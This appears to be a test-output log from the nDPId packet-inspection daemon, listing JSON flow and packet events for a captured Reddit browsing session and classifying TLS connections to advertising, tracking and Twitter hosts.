+00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687485,"flow_last_seen":1605291687485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605291687485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687485,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ4AAAAAoAL9IP2VAAACBAWgBAIICruOxrcAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2341,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605291687512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687512,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAKzZEsIqAcsBIEmLB5kd7IUo3\/YpAbvHUvrRnoyfz12foBJXgAjWAAACBAV4AQMDAwQCCArC1z5Fu47Gtw=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2342,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1605291687513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687513,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ\/60Z6NgBAB+4zMAAABAQgKu47G0sLXPkU="} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687514,"flow_last_seen":1605291687514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687514,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605291687514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687514,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5MAAAAAoAL9IOSoAAACBAWgBAIICiRA7pIAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605291687545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687545,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleJ0qAcsBIEmLB5kd7IUo3\/YpAbu8cGxxKx0ItjeUoBJXgPGUAAACBAV4AQMDAwQCCArC1z5pJEDukg=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1605291687545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687545,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5RscSsegBAB+3WHAAABAQgKJEDuscLXPmk="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687642,"flow_last_seen":1605291687642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687642,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605291687642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687642,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxgAAAAAoAL9IGTNAAACBAWgBAIICsL4XLwAAAAAAQMDBw=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605291687676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687676,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAgqAcsBIEmLB5kd7IUo3\/YpAbuaYOcfuuGDx7sZoBJXgGbFAAACBAV4AQMDAwQCCArC1z7qwvhcvA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1605291687676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687676,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxnnH7rigBAB++qzAAABAQgKwvhc38LXPuo="} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687761,"flow_last_seen":1605291687761,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605291687761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687761,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bcAAAAAoAL9IFSZAAACBAWgBAIIClvEqOkAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2609,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605291687790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687790,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs9EqAcsBIEmLB5kd7IUo3\/YpAbuAylJzVUg0Stm4oBJXgFBhAAACBAV4AQMDAwQCCArC1z9gW8So6Q=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2610,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1605291687790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687790,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bhSc1VJgBAB+9RVAAABAQgKW8SpBsLXP2A="} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687800,"flow_last_seen":1605291687800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687800,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605291687800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687800,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8MAAAAAoAL9IICJAAACBAWgBAIICk1+jVUAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605291687829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687829,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dXkT\/jDfEoBJXgChEAAACBAV4AQMDAwQCCArC1z+HTX6NVQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1605291687829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687829,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8SdXV5FgBAB+6w4AAABAQgKTX6NcsLXP4c="} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687896,"flow_last_seen":1605291687896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687896,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605291687896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687896,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetUAAAAAoAL9ICsYAAACBAWgBAIIClOdBf4AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687931,"flow_last_seen":1605291687931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687931,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605291687931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687931,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0vYAAAAAoAL9ILpIAAACBAWgBAIICnCSuGYAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2917,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605291687932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687932,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAACJ4z5QqAcsBIEmLB5kd7IUo3\/YpAbuayhO+xPN32HrWoBJXgPVcAAACBAV4AQMDAwQCCArC1z\/tU50F\/g=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2918,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1605291687932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687932,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetYTvsT0gBAB+3lKAAABAQgKU50GIsLXP+0="} +00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 